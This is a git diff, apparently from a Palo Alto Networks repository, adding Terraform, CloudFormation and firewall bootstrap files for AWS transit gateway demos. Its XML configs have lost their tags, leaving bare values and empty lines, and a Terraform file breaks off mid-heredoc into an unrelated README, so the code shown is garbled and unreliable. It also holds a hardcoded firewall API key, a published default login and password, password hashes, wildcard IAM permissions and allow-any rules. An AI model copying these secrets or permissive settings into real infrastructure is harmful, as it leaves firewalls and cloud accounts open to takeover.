c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDcG9tWXUwNjNjQ2ViamNpd2R3czRyNjluUWNDcXoyQkkvMHR4WjA4RElzQkw3WFNqUmlSRCtvU3pDN1E4bTFOZ1dFcTN5ajRJTlI4Sm01WnZjcDJpRmVCbWdXTmZWc2hFQ1FwU2lMTmJXMFE5L05NRkNiZG9WandRUFhhRmhHTFQ1M2RiR3BzUFc4bE44NnRJam01cCsrYlR5T2tuUzFSUlJMWnNoYjZpSXRxbXZoRVdNRnZ4NG1CdnVxTHVqSHRaN1JhSksveTAxUkxGMXZCRE1aN01mbnVObGgwVXM1cTIwT2k0NjlLNzBrbi81bnF4YzZIWGpPRnRiYUZtUnhwK0FXbGs0a0x4YTdrTE0wNjMxRUgyUlZzY1Q5Q2kzYURVK2JPKzI0dzRGK2Y5U05NeFQzOW1TeFpmWXlMWHlqSGdWeE93QjZuRW5IUUcxSjdCRldHa1QgbXJtLWVhc3R1czEta2V5 + mgmt-interface-swap + + + + yes + security-i-secur-Publi-MBTK5R0EMJSF_ASG_us-east-1a + + + + + + + + + + + + ethernet1/1 + + + + + + + ethernet1/2 + + + + + + + + + + + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + allow + + + + + + + + + + + ethernet1/1 + ethernet1/2 + + + +
+ + 10.255.1.4 + UNTRUST-IP-address + +
+
+
+
+
+
diff --git a/aws/tgw_inbound_asg/bootstrap_files/init-cfg.txt b/aws/tgw_inbound_asg/bootstrap_files/init-cfg.txt new file mode 100644 index 00000000..c77f637b --- /dev/null +++ b/aws/tgw_inbound_asg/bootstrap_files/init-cfg.txt @@ -0,0 +1,10 @@ +type=dhcp-client +ip-address= +default-gateway= +netmask= +ipv6-address= +ipv6-default-gateway= +dhcp-accept-server-hostname=yes +dns-primary=8.8.8.8 +dns-secondary=4.2.2.2 +op-command-modes=mgmt-interface-swap diff --git a/aws/tgw_inbound_asg/bootstrap_files/nlb.zip b/aws/tgw_inbound_asg/bootstrap_files/nlb.zip new file mode 100644 index 00000000..066e08bc Binary files /dev/null and b/aws/tgw_inbound_asg/bootstrap_files/nlb.zip differ diff --git a/aws/tgw_inbound_asg/bootstrap_files/pan_nlb_lambda.template b/aws/tgw_inbound_asg/bootstrap_files/pan_nlb_lambda.template new file mode 100644 index 00000000..5d0b96fd --- /dev/null +++ b/aws/tgw_inbound_asg/bootstrap_files/pan_nlb_lambda.template @@ -0,0 +1,486 @@ +{ + "AWSTemplateFormatVersion" : "2010-09-09", + "Description" : "Creates an AWS Network Load balancer, which multiplexes traffic to registered scaled out back end web servers", + "Parameters": { + "NLBName": { + "Type" : "String", + "Description": "Enter the name of the NLB", + "Default": "prot-nlb", + "MinLength" : "3", + "MaxLength" : "120" + }, + "NLBARN": { + "Type" : "String", + "Description": "Enter the ARN of the NLB", + "Default": "prot-nlb", + "MinLength" : "3", + "MaxLength" : "150" + }, + "QueueURL": { + "Type" : "String", + "Description": "Enter the URL of the Queue to send messages to", + "MinLength" : "3", + "MaxLength" : "1024" + }, + "TableName": { + "Type" : "String", + "Default": "nlb_db_tbl", + "Description": "Enter the name of the database table", + "MinLength" : "3", + "MaxLength" : "120" + }, + "S3BucketName": { + "Type" : "String", + "Description": "Enter the name of the S3 Bucket which contains the lambda code", + "MinLength" : "3", + "MaxLength" : "120" + }, + "S3ObjectName": { + "Type" : "String", + "Default": "nlb.zip", + "Description": "Enter the name of the S3 object which contains the lambda code", + "MinLength" : "3", + "MaxLength" : "120" + }, + "RoleARN": { + "Type": "String", + "Default": "", + "Description": "The ARN of the role to use for Cross Account Access", + "MaxLength" : "120" + }, + "ExternalId": { + "Type": "String", + "Default": "", + "Description": "The external ID associated with the Cross Account Role", + "MaxLength" : "120" + }, + "SameAccount": { + "Type": "String", + "Default": "true", + "Description": "Flag to indicate if the NLB will be deployed into the same account or a different one", + "AllowedValues": [ + "true", + "false" + ] + } + }, + "Metadata" : { + "AWS::CloudFormation::Interface" : { + "ParameterLabels" : { + "NLB ARN": {"Ref": "NLBARN"}, + "NLB Name": {"Ref": "NLBNAME"}, + "Queue URL": {"Ref": "QueueURL"}, + "Table Name": {"Ref": "TableName"}, + "Lambda S3 Bucket Name": {"Ref": "S3BucketName"}, + "Lambda S3 Object Name": {"Ref": "S3ObjectName"} + } + } + }, + "Conditions": { + "CreateCrossAccountRole": {"Fn::Equals" : [{"Ref": "SameAccount"}, "false"] }, + "NoCrossAccountRole": {"Fn::Equals" : [{"Ref": "SameAccount"}, "true"] } + }, + "Resources": { + "LambdaExecutionRole0" : { + "Type": "AWS::IAM::Role", + "Condition": "NoCrossAccountRole", + "Properties": { + "AssumeRolePolicyDocument": { + "Version": "2012-10-17", + "Statement": [ { + "Effect": "Allow", + "Principal": { + "Service": "lambda.amazonaws.com" + }, + "Action": "sts:AssumeRole" + } ] + }, + "Path":"/", + "Policies": [ { + "PolicyName": "LambdaExecutionRolePolicy", + "PolicyDocument":{ + "Version": "2012-10-17", + "Statement": [ + { + "Effect": "Allow", + "Action": "s3:ListBucket", + "Resource": { "Fn::Join": [ "", [ "arn:aws:s3:::", {"Ref": "S3BucketName" }, "/*" ] ] } + }, + { + "Effect": "Allow", + "Action": "s3:GetObject", + "Resource": { "Fn::Join": [ "", [ "arn:aws:s3:::", { "Ref": "S3BucketName" }, "/*" ] ] } + }, + { + "Effect": "Allow", + "Action": [ + "ec2:DescribeSubnets" + ], + "Resource": [ + "*" + ] + }, + { + "Effect": "Allow", + "Action": [ + "events:*" + ], + "Resource": [ + "*" + ] + }, + { + "Effect": "Allow", + "Action": [ + "cloudwatch:*" + ], + "Resource": [ + "*" + ] + }, + { + "Effect": "Allow", + "Action": [ + "lambda:AddPermission", + "lambda:CreateEventSourceMapping", + "lambda:CreateFunction", + "lambda:DeleteEventSourceMapping", + "lambda:DeleteFunction", + "lambda:GetEventSourceMapping", + "lambda:ListEventSourceMappings", + "lambda:RemovePermission", + "lambda:UpdateEventSourceMapping", + "lambda:UpdateFunctionCode", + "lambda:UpdateFunctionConfiguration", + "lambda:GetFunction", + "lambda:ListFunctions" + ], + "Resource": [ + "*" + ] + }, + { + "Effect": "Allow", + "Action": [ + "sqs:ReceiveMessage", + "sqs:SendMessage", + "sqs:SetQueueAttributes", + "sqs:PurgeQueue" + ], + "Resource": [ + "*" + ] + }, + { + "Effect": "Allow", + "Action": [ + "elasticloadbalancing:AddTags", + "elasticloadbalancing:AttachLoadBalancerToSubnets", + "elasticloadbalancing:ConfigureHealthCheck", + "elasticloadbalancing:DescribeInstanceHealth", + "elasticloadbalancing:DescribeLoadBalancerAttributes", + "elasticloadbalancing:DescribeLoadBalancerPolicyTypes", + "elasticloadbalancing:DescribeLoadBalancerPolicies", + "elasticloadbalancing:DescribeLoadBalancers", + "elasticloadbalancing:DescribeTags", + "elasticloadbalancing:DetachLoadBalancerFromSubnets", + "elasticloadbalancing:ModifyLoadBalancerAttributes", + "elasticloadbalancing:RemoveTags" + ], + "Resource": [ + "*" + ] + }, + { + "Effect": "Allow", + "Action": [ + "iam:PassRole", + "iam:GetRole" + ], + "Resource": [ + "*" + ] + }, + { + "Effect": "Allow", + "Action": ["logs:CreateLogGroup","logs:CreateLogStream","logs:PutLogEvents"], + "Resource": "arn:aws:logs:*:*:*" + }, + { + "Effect": "Allow", + "Action": ["cloudformation:DescribeStacks"], + "Resource": "*" + }, + { + "Effect": "Allow", + "Action": [ + "logs:CreateLogGroup", + "logs:CreateLogStream", + "logs:PutDestination", + "logs:PutDestinationPolicy", + "logs:PutLogEvents", + "logs:PutMetricFilter" + ], + "Resource": [ + "*" + ] + }, + { + "Effect": "Allow", + "Action": [ + "dynamodb:CreateTable", + "dynamodb:DeleteItem", + "dynamodb:DeleteTable", + "dynamodb:GetItem", + "dynamodb:PutItem" + ], + "Resource": [ + "*" + ] + } + ] + }}]} + }, + "LambdaExecutionRole1" : { + "Type": "AWS::IAM::Role", + "Condition": "CreateCrossAccountRole", + "Properties": { + "AssumeRolePolicyDocument": { + "Version": "2012-10-17", + "Statement": [ { + "Effect": "Allow", + "Principal": { + "Service": "lambda.amazonaws.com" + }, + "Action": "sts:AssumeRole" + } ] + }, + "Path":"/", + "Policies": [ { + "PolicyName": "LambdaExecutionRolePolicy", + "PolicyDocument":{ + "Version": "2012-10-17", + "Statement": [ + { + "Effect": "Allow", + "Action": "sts:AssumeRole", + "Resource": {"Ref": "RoleARN"} + }, + { + "Effect": "Allow", + "Action": "s3:ListBucket", + "Resource": { "Fn::Join": [ "", [ "arn:aws:s3:::", {"Ref": "S3BucketName" }, "/*" ] ] } + }, + { + "Effect": "Allow", + "Action": "s3:GetObject", + "Resource": { "Fn::Join": [ "", [ "arn:aws:s3:::", { "Ref": "S3BucketName" }, "/*" ] ] } + }, + { + "Effect": "Allow", + "Action": [ + "ec2:DescribeSubnets" + ], + "Resource": [ + "*" + ] + }, + { + "Effect": "Allow", + "Action": [ + "events:*" + ], + "Resource": [ + "*" + ] + }, + { + "Effect": "Allow", + "Action": [ + "cloudwatch:*" + ], + "Resource": [ + "*" + ] + }, + { + "Effect": "Allow", + "Action": [ + "lambda:AddPermission", + "lambda:CreateEventSourceMapping", + "lambda:CreateFunction", + "lambda:DeleteEventSourceMapping", + "lambda:DeleteFunction", + "lambda:GetEventSourceMapping", + "lambda:ListEventSourceMappings", + "lambda:RemovePermission", + "lambda:UpdateEventSourceMapping", + "lambda:UpdateFunctionCode", + "lambda:UpdateFunctionConfiguration", + "lambda:GetFunction", + "lambda:ListFunctions" + ], + "Resource": [ + "*" + ] + }, + { + "Effect": "Allow", + "Action": [ + "sqs:ReceiveMessage", + "sqs:SendMessage", + "sqs:SetQueueAttributes", + "sqs:PurgeQueue" + ], + "Resource": [ + "*" + ] + }, + { + "Effect": "Allow", + "Action": [ + "elasticloadbalancing:AddTags", + "elasticloadbalancing:AttachLoadBalancerToSubnets", + "elasticloadbalancing:ConfigureHealthCheck", + "elasticloadbalancing:DescribeInstanceHealth", + "elasticloadbalancing:DescribeLoadBalancerAttributes", + "elasticloadbalancing:DescribeLoadBalancerPolicyTypes", + "elasticloadbalancing:DescribeLoadBalancerPolicies", + "elasticloadbalancing:DescribeLoadBalancers", + "elasticloadbalancing:DescribeTags", + "elasticloadbalancing:DetachLoadBalancerFromSubnets", + "elasticloadbalancing:ModifyLoadBalancerAttributes", + "elasticloadbalancing:RemoveTags" + ], + "Resource": [ + "*" + ] + }, + { + "Effect": "Allow", + "Action": [ + "iam:PassRole", + "iam:GetRole" + ], + "Resource": [ + "*" + ] + }, + { + "Effect": "Allow", + "Action": ["logs:CreateLogGroup","logs:CreateLogStream","logs:PutLogEvents"], + "Resource": "arn:aws:logs:*:*:*" + }, + { + "Effect": "Allow", + "Action": ["cloudformation:DescribeStacks"], + "Resource": "*" + }, + { + "Effect": "Allow", + "Action": [ + "logs:CreateLogGroup", + "logs:CreateLogStream", + "logs:PutDestination", + "logs:PutDestinationPolicy", + "logs:PutLogEvents", + "logs:PutMetricFilter" + ], + "Resource": [ + "*" + ] + }, + { + "Effect": "Allow", + "Action": [ + "dynamodb:CreateTable", + "dynamodb:DeleteItem", + "dynamodb:DeleteTable", + "dynamodb:GetItem", + "dynamodb:PutItem" + ], + "Resource": [ + "*" + ] + } + ] + }}]} + }, + "NLBDeployerLambda0" : { + "Type": "AWS::Lambda::Function", + "Condition": "NoCrossAccountRole", + "Properties": { + "Handler": "nlb_deployer.nlb_deploy_handler", + "Role": {"Fn::GetAtt" : + ["LambdaExecutionRole0", + "Arn" + ] + }, + "Code": { + "S3Bucket": { "Ref": "S3BucketName"}, + "S3Key": { "Ref": "S3ObjectName"} + }, + "Runtime": "python2.7", + "Timeout": "300" + } + }, + "NLBDeployerLambda1" : { + "Type": "AWS::Lambda::Function", + "Condition": "CreateCrossAccountRole", + "Properties": { + "Handler": "nlb_deployer.nlb_deploy_handler", + "Role": {"Fn::GetAtt" : + ["LambdaExecutionRole1", + "Arn" + ] + }, + "Code": { + "S3Bucket": { "Ref": "S3BucketName"}, + "S3Key": { "Ref": "S3ObjectName"} + }, + "Runtime": "python2.7", + "Timeout": "300" + } + }, + "LambdaCustomResource0": { + "Type": "AWS::CloudFormation::CustomResource", + "Condition": "NoCrossAccountRole", + "Version" : "1.0", + "DependsOn": ["NLBDeployerLambda0"], + "Properties" : { + "ServiceToken": { "Fn::GetAtt" : ["NLBDeployerLambda0", "Arn"] }, + "StackName": {"Ref": "AWS::StackName"}, + "Region": {"Ref": "AWS::Region"}, + "table_name": {"Ref": "TableName"}, + "NLB-ARN": {"Ref": "NLBARN"}, + "NLB-NAME": {"Ref": "NLBName"}, + "LambdaExecutionRole": {"Ref": "LambdaExecutionRole0"}, + "S3BucketName": {"Ref": "S3BucketName"}, + "S3ObjectName": {"Ref": "S3ObjectName"}, + "QueueURL": {"Ref": "QueueURL"}, + "RoleARN": {"Ref": "RoleARN"}, + "ExternalId": {"Ref": "ExternalId"} + } + }, + "LambdaCustomResource1": { + "Type": "AWS::CloudFormation::CustomResource", + "Condition": "CreateCrossAccountRole", + "Version" : "1.0", + "DependsOn": ["NLBDeployerLambda1"], + "Properties" : { + "ServiceToken": { "Fn::GetAtt" : ["NLBDeployerLambda1", "Arn"] }, + "StackName": {"Ref": "AWS::StackName"}, + "Region": {"Ref": "AWS::Region"}, + "table_name": {"Ref": "TableName"}, + "NLB-ARN": {"Ref": "NLBARN"}, + "NLB-NAME": {"Ref": "NLBName"}, + "LambdaExecutionRole": {"Ref": "LambdaExecutionRole1"}, + "S3BucketName": {"Ref": "S3BucketName"}, + "S3ObjectName": {"Ref": "S3ObjectName"}, + "QueueURL": {"Ref": "QueueURL"}, + "RoleARN": {"Ref": "RoleARN"}, + "ExternalId": {"Ref": "ExternalId"} + } + } + } +} diff --git a/aws/tgw_inbound_asg/bootstrap_files/panw-aws.zip b/aws/tgw_inbound_asg/bootstrap_files/panw-aws.zip new file mode 100644 index 00000000..83dbc829 Binary files /dev/null and b/aws/tgw_inbound_asg/bootstrap_files/panw-aws.zip differ diff --git a/aws/tgw_inbound_asg/diagram.png b/aws/tgw_inbound_asg/diagram.png new file mode 100644 index 00000000..59f6541c Binary files /dev/null and b/aws/tgw_inbound_asg/diagram.png differ diff --git a/aws/tgw_inbound_asg/main.tf b/aws/tgw_inbound_asg/main.tf new file mode 100644 index 00000000..4b426bba --- /dev/null +++ b/aws/tgw_inbound_asg/main.tf @@ -0,0 +1,87 @@ +/* + SUPPORT POLICY +The guide in this directory and accompanied files are released under an as-is, best effort, support policy. +These scripts should be seen as community supported and Palo Alto Networks will contribute our expertise as +and when possible. We do not provide technical support or help in using or troubleshooting the components of +the project through our normal support options such as Palo Alto Networks support teams, or ASC (Authorized +Support Centers) partners and backline support options. The underlying product used (the VM-Series firewall) +by the scripts or templates are still supported, but the support is only for the product functionality and +not for help in deploying or using the template or script itself. Unless explicitly tagged, all projects or +work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official +Downloads page on https://support.paloaltonetworks.com are provided under the best effort policy. +*/ + +#----------------------------------------------------------------------------------------------------------------- +# CREATE INBOUND SECURITY VPC +module "vpc_in" { + source = "./modules/vpc_in/" + tag = "${var.tag}" + region = "${var.region}" + tgw_id = "${var.tgw_id}" + tgw_rtb_id = "${var.tgw_rtb_id}" + cidr_vpc = "10.255.0.0/16" + azs = ["us-east-1a", "us-east-1b"] + cidr_mgmt = ["10.255.0.0/28", "10.255.0.16/28"] + cidr_untrust = ["10.255.1.0/28", "10.255.1.16/28"] + cidr_trust = ["10.255.2.0/28", "10.255.2.16/28"] + cidr_tgw = ["10.255.3.0/28", "10.255.3.16/28"] + cidr_natgw = ["10.255.4.0/28", "10.255.4.16/28"] + cidr_lambda = ["10.255.5.0/28", "10.255.5.16/28"] +} + +#----------------------------------------------------------------------------------------------------------------- +# CREATE S3 BUCKET FOR VM-SERIES BOOTSTRAP +module "s3_in" { + source = "./modules/s3_bootstrap/" + + file_location = "bootstrap_files/" + bucket_name = "fw-tgw-inbound-demo" + bucket_name_random = true + config = ["bootstrap.xml", "init-cfg.txt"] + license = ["authcodes"] + content = [] + software = [] + other = ["panw-aws.zip", "pan_nlb_lambda.template", "nlb.zip"] +} + +#----------------------------------------------------------------------------------------------------------------- +# DEPLOY VM-SERIES AUTOSCALE GROUP +module "fw_in" { + source = "./modules/fw_in_asg/" + + tag = "${var.tag}" + region = "${var.region}" + vpc_id = "${module.vpc_in.vpc_id}" + vpc_sg_id = "${module.vpc_in.default_security_group_id}" + lambda_bucket = "${module.s3_in.bucket_name}" + lambda_subnet_id = "${module.vpc_in.lambda_id}" + natgw_subnet_id = "${module.vpc_in.natgw_id}" + + fw_key_name = "${var.key_name}" + fw_bucket = "${module.s3_in.bucket_name}" + fw_ami = "${var.fw_ami}" + fw_vm_type = "m4.xlarge" + fw_sg_source = "${var.fw_sg_source}" + fw_subnet0_id = "${module.vpc_in.mgmt_id}" + fw_subnet1_id = "${module.vpc_in.untrust_id}" + fw_subnet2_id = "${module.vpc_in.trust_id}" + fw_min_instances = "1" // FOR EACH AZ + fw_max_instances = "2" // FOR EACH AZ + fw_scale_threshold_up = "80" + fw_scale_threshold_down = "20" + fw_scale_parameter = "DataPlaneCPUUtilizationPct" + fw_scale_period = "900" + + api_key_firewall = "LUFRPT1Zd2pYUGpkMUNrVEZlb3hROEQyUm95dXNGRkU9N0d4RGpTN2VZaVZYMVVoS253U0p6dlk3MkM0SDFySEh2UUR4Y3hzK2g3ST0=" + api_key_panorama = "" + api_key_delicense = "" + + enable_debug = "No" + + dependencies = [ + "${module.s3_in.completion}", + ] +} + +#----------------------------------------------------------------------------------------------------------------- + diff --git a/aws/tgw_inbound_asg/modules/fw_in_asg/main.tf b/aws/tgw_inbound_asg/modules/fw_in_asg/main.tf new file mode 100644 index 00000000..35f18c1e --- /dev/null +++ b/aws/tgw_inbound_asg/modules/fw_in_asg/main.tf @@ -0,0 +1,810 @@ +resource "null_resource" "dependency_getter" { + provisioner "local-exec" { + command = "echo ${length(var.dependencies)}" + } +} + +resource "random_string" "randomstring" { + length = 6 + min_upper = 4 + min_numeric = 2 + special = false +} + +resource "aws_iam_role" "FirewallBootstrapRole" { + name = "${var.tag}-vmseries-${random_string.randomstring.result}" + + assume_role_policy = < + +

+ +#### VM-Series Overview +* Firewall-1 handles egress traffic to internet +* Firewall-2 handles east/west traffic between Spoke1-VPC and Spoke2-VPC +* Both Firewalls can handle inbound traffic to the spokes +* Firewalls are bootstrapped off an S3 Bucket (buckets are created during deployment) + +#### S3 Buckets Overview +* 2 x S3 Buckets are deployed & configured to bootstrap the firewalls with a fully working configuration. +* The buckets names have a random 30 string added to its name for global uniqueness `tgw-fw#-bootstrap-` + +## Prerequistes +1. This Terraform build assumes the AWS CLI is installed on the machine doing the deploymnet [(Install AWS CLI)](https://docs.aws.amazon.com/cli/latest/userguide/cli-chap-install.html) . +2. If you do not want to use the AWS CLI, the `providers.tf` must be modified to include your AWS Access Key and Secret Key [(more info)](https://www.terraform.io/docs/providers/aws/index.html). + +## How to Deploy +1. Download the **transitgateway-demo-v2** directory. +2. In an editor, open `variables.tf` + * `Line 10`: Set your existing AWS EC2 Key + * `Line 14`: Enter a source address to access the VM-Series management interface (in valid CIDR notation). This address will be added to the management interface's Network Security Group. + * `Line 17`: Uncomment either 'byol', 'payg1', or 'payg2'. This sets the licensing for both VM-Series firewalls (bring-your-own-license, bundle1, or bundle2). +3. (Optional) If you are using BYOL and would like to license the VM-Series via bootstrapping, paste your authcode in `bootstrap_files/fw1/authcodes` and `bootstrap_files/fw2/authcodes`. (Note: The authcode must be registered prior to deployment). +4. After deployment, the firewalls' username and password are: + * **Username:** paloalto + * **Password:** PanPassword123! + + + +## Support Policy +The guide in this directory and accompanied files are released under an as-is, best effort, support policy. These scripts should be seen as community supported and Palo Alto Networks will contribute our expertise as and when possible. We do not provide technical support or help in using or troubleshooting the components of the project through our normal support options such as Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support options. The underlying product used (the VM-Series firewall) by the scripts or templates are still supported, but the support is only for the product functionality and not for help in deploying or using the template or script itself. +Unless explicitly tagged, all projects or work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads page on https://support.paloaltonetworks.com are provided under the best effort policy. diff --git a/aws/transitgateway-demo-v2/bootstrap_files/fw1/authcodes b/aws/transitgateway-demo-v2/bootstrap_files/fw1/authcodes new file mode 100644 index 00000000..8b137891 --- /dev/null +++ b/aws/transitgateway-demo-v2/bootstrap_files/fw1/authcodes @@ -0,0 +1 @@ + diff --git a/aws/transitgateway-demo-v2/bootstrap_files/fw1/bootstrap.xml b/aws/transitgateway-demo-v2/bootstrap_files/fw1/bootstrap.xml new file mode 100644 index 00000000..c9e19aeb --- /dev/null +++ b/aws/transitgateway-demo-v2/bootstrap_files/fw1/bootstrap.xml @@ -0,0 +1,822 @@ + + + + + + $1$kinpefww$Y2Rzm/JZNfQxs6SB3oW5A. + + + yes + + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDSWphVDNFbnRlRU80cHFIM09aRnFIOFB6ekFnZmtnNG1yYnNpaWZyZzZDTDJqNjFmbWhIRTFVdjlZalBVRjhJMUhrei9lWGpuMno4Z2ltOEdVcFR1WDExUXhiSmNsM1NLYU51VGxWWVA0VnJvSmJDU3VBVStDdzcyT3haMTN3UVFXa0JzaDRnV05iZ3dnSU1TcURHckYvSlZMV2JxemZDeWFEVmltVVRqdFN4L0NSVDUwbEpqdGR4b2pVdm5mUHZnWXQrVVNBNVpqSExPMDJvY1hZcXBhSEp3UnN5OUo2NGtVcEluRXBKYlFqbXZhajJieVIzb1ZkYzVuVlNsREtvWVlzd1ZNUlZxUXQwNDFYdFhhSm9yZm9SYnF1dmd6Vk1sN2w5V0JWQ2RYOE8rbm9iSHlMT1lZdVBqU05IN1FKZVNPeDJkd1N2ZG9zRmJmZ3ZpUHRjT1QgbXJtLWVhc3R1cy1rZXk= + + + + + yes + + + $1$oxidaogq$toVFt6xD7ruJnTHYeVftq1 + + + + + + + + + + + + + yes + 5 + + + yes + 5 + + + yes + 5 + + + yes + 10 + + + yes + 5 + + + + yes + + + + 10 + 10 + + 100 + 50 + + + + 10 + 10 + + 100 + 50 + + + + + + 100 + yes + + + + + + + + + + + + + + + + + + + + + no + + + + + no + + + no + + + + + + + + + + no + + + + + no + + + no + + + no + + allow-lambda + + + + + + + + + + + 3 + 5 + wait-recover + + + + + yes + + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + + 8 + + + + + aes-128-cbc + + + sha256 + + + group19 + + + 8 + + + + + aes-256-cbc + + + sha384 + + + group20 + + + 8 + + + + + sha1 + + + group2 + + + aes-128-cbc + + + 28800 + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + 1 + + + + + + aes-128-gcm + + + none + + + group19 + + 1 + + + + + + aes-256-gcm + + + none + + + group20 + + 1 + + + + + + sha1 + + + aes-128-cbc + + + + 3600 + + group2 + + + + + + aes-128-cbc + + + sha1 + + + + + + + + + + + + real-time + + + high + + + high + + + medium + + + medium + + + low + + + low + + + low + + + + + + + + + + no + + + 1.25 + 0.5 + 900 + 300 + 900 + yes + + + + + yes + + + no + + + no + + + no + + + no + + + + ethernet1/1 + ethernet1/2 + + + + + + + + + + + + no + any + 2 + + + 192.168.10.1 + + + None + + ethernet1/1 + 10 + 0.0.0.0/0 + + + + + + + no + any + 2 + + + 192.168.20.1 + + + None + + ethernet1/2 + 10 + 10.0.0.0/8 + + + + + + + + + + + + + + + + + + yes + yes + no + yes + + + updates.paloaltonetworks.com + + + + + wednesday + 01:02 + download-only + + + + + America/New_York + + yes + yes + + vmseries-fw1 + + + + yes + + + FQDN + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDSWphVDNFbnRlRU80cHFIM09aRnFIOFB6ekFnZmtnNG1yYnNpaWZyZzZDTDJqNjFmbWhIRTFVdjlZalBVRjhJMUhrei9lWGpuMno4Z2ltOEdVcFR1WDExUXhiSmNsM1NLYU51VGxWWVA0VnJvSmJDU3VBVStDdzcyT3haMTN3UVFXa0JzaDRnV05iZ3dnSU1TcURHckYvSlZMV2JxemZDeWFEVmltVVRqdFN4L0NSVDUwbEpqdGR4b2pVdm5mUHZnWXQrVVNBNVpqSExPMDJvY1hZcXBhSEp3UnN5OUo2NGtVcEluRXBKYlFqbXZhajJieVIzb1ZkYzVuVlNsREtvWVlzd1ZNUlZxUXQwNDFYdFhhSm9yZm9SYnF1dmd6Vk1sN2w5V0JWQ2RYOE8rbm9iSHlMT1lZdVBqU05IN1FKZVNPeDJkd1N2ZG9zRmJmZ3ZpUHRjT1QgbXJtLWVhc3R1cy1rZXk= + + + yes + yes + no + yes + + + vmseries-fw1 + mgmt-interface-swap + + + + + + + + + + + + + ethernet1/1 + + + + + + + ethernet1/2 + + + + + + + + + 1001 + + + + + + + + + + 2001 + + + + + + + + + + 1002 + + + + + + + + + + 2002 + + + + + + + + + + + + + + + trust-zone + + + untrust-zone + + + any + + + any + + + any + + + any + + + ssh + + + tcp-1001 + tcp-1002 + tcp-2001 + tcp-2002 + + + any + + allow + yes + + + + trust-zone + + + trust-zone + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + allow + + + + untrust-zone + + + trust-zone + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + allow + + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + deny + + + + + + + + + + ethernet1/1 + + + + + untrust-zone + + + trust-zone + + + any + + + any + + any + + + + untrust-zone + + + untrust-zone + + + any + + + untrust-fw1 + + tcp-1001 + + + + ethernet1/2 + + + + + 22 + 10.1.0.4 + + any + + + + untrust-zone + + + untrust-zone + + + any + + + untrust-fw1 + + tcp-1002 + + + + ethernet1/2 + + + + + 22 + 10.1.1.4 + + + + + untrust-zone + + + untrust-zone + + + any + + + untrust-fw1 + + tcp-2001 + + + + ethernet1/2 + + + + + 22 + 10.2.0.4 + + + + + untrust-zone + + + untrust-zone + + + any + + + untrust-fw1 + + tcp-2002 + + + + ethernet1/2 + + + + + 22 + 10.2.1.4 + + + + + + + + allow + no + yes + + + deny + no + yes + + + + + + + + ethernet1/1 + ethernet1/2 + + + +
+ + 192.168.10.4 + +
+ + + color6 + + + color13 + + +
+
+
+
+
diff --git a/aws/transitgateway-demo-v2/bootstrap_files/fw1/init-cfg.txt b/aws/transitgateway-demo-v2/bootstrap_files/fw1/init-cfg.txt new file mode 100644 index 00000000..968814f6 --- /dev/null +++ b/aws/transitgateway-demo-v2/bootstrap_files/fw1/init-cfg.txt @@ -0,0 +1,18 @@ +type=dhcp-client +ip-address= +default-gateway= +netmask= +ipv6-address= +ipv6-default-gateway= +hostname=vmseries-fw1 +panorama-server= +panorama-server-2= +tplname= +dgname= +dns-primary= +dns-secondary= +op-command-modes=mgmt-interface-swap +dhcp-send-hostname=yes +dhcp-send-client-id=yes +dhcp-accept-server-hostname=no +dhcp-accept-server-domain=yes diff --git a/aws/transitgateway-demo-v2/bootstrap_files/fw2/authcodes b/aws/transitgateway-demo-v2/bootstrap_files/fw2/authcodes new file mode 100644 index 00000000..8b137891 --- /dev/null +++ b/aws/transitgateway-demo-v2/bootstrap_files/fw2/authcodes @@ -0,0 +1 @@ + diff --git a/aws/transitgateway-demo-v2/bootstrap_files/fw2/bootstrap.xml b/aws/transitgateway-demo-v2/bootstrap_files/fw2/bootstrap.xml new file mode 100644 index 00000000..32e7d2e8 --- /dev/null +++ b/aws/transitgateway-demo-v2/bootstrap_files/fw2/bootstrap.xml @@ -0,0 +1,821 @@ + + + + + + $1$gyvolqhn$qTxyak3dNrZGte6mj5znJ. + + + yes + + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDSWphVDNFbnRlRU80cHFIM09aRnFIOFB6ekFnZmtnNG1yYnNpaWZyZzZDTDJqNjFmbWhIRTFVdjlZalBVRjhJMUhrei9lWGpuMno4Z2ltOEdVcFR1WDExUXhiSmNsM1NLYU51VGxWWVA0VnJvSmJDU3VBVStDdzcyT3haMTN3UVFXa0JzaDRnV05iZ3dnSU1TcURHckYvSlZMV2JxemZDeWFEVmltVVRqdFN4L0NSVDUwbEpqdGR4b2pVdm5mUHZnWXQrVVNBNVpqSExPMDJvY1hZcXBhSEp3UnN5OUo2NGtVcEluRXBKYlFqbXZhajJieVIzb1ZkYzVuVlNsREtvWVlzd1ZNUlZxUXQwNDFYdFhhSm9yZm9SYnF1dmd6Vk1sN2w5V0JWQ2RYOE8rbm9iSHlMT1lZdVBqU05IN1FKZVNPeDJkd1N2ZG9zRmJmZ3ZpUHRjT1QgbXJtLWVhc3R1cy1rZXk= + + + + + yes + + + $1$lfqxgvff$AYLGhPFeBO8CyXTeBaqEg. + + + + + + + + + + + + + yes + 5 + + + yes + 5 + + + yes + 5 + + + yes + 10 + + + yes + 5 + + + + yes + + + + 10 + 10 + + 100 + 50 + + + + 10 + 10 + + 100 + 50 + + + + + + 100 + yes + + + + + + + + + + + + + + + + + + + + + no + + + + + no + + + no + + + + + + + + + + no + + + + + no + + + no + + + no + + allow-lambda + + + + + + + + + + + 3 + 5 + wait-recover + + + + + yes + + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + + 8 + + + + + aes-128-cbc + + + sha256 + + + group19 + + + 8 + + + + + aes-256-cbc + + + sha384 + + + group20 + + + 8 + + + + + sha1 + + + group2 + + + aes-128-cbc + + + 28800 + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + 1 + + + + + + aes-128-gcm + + + none + + 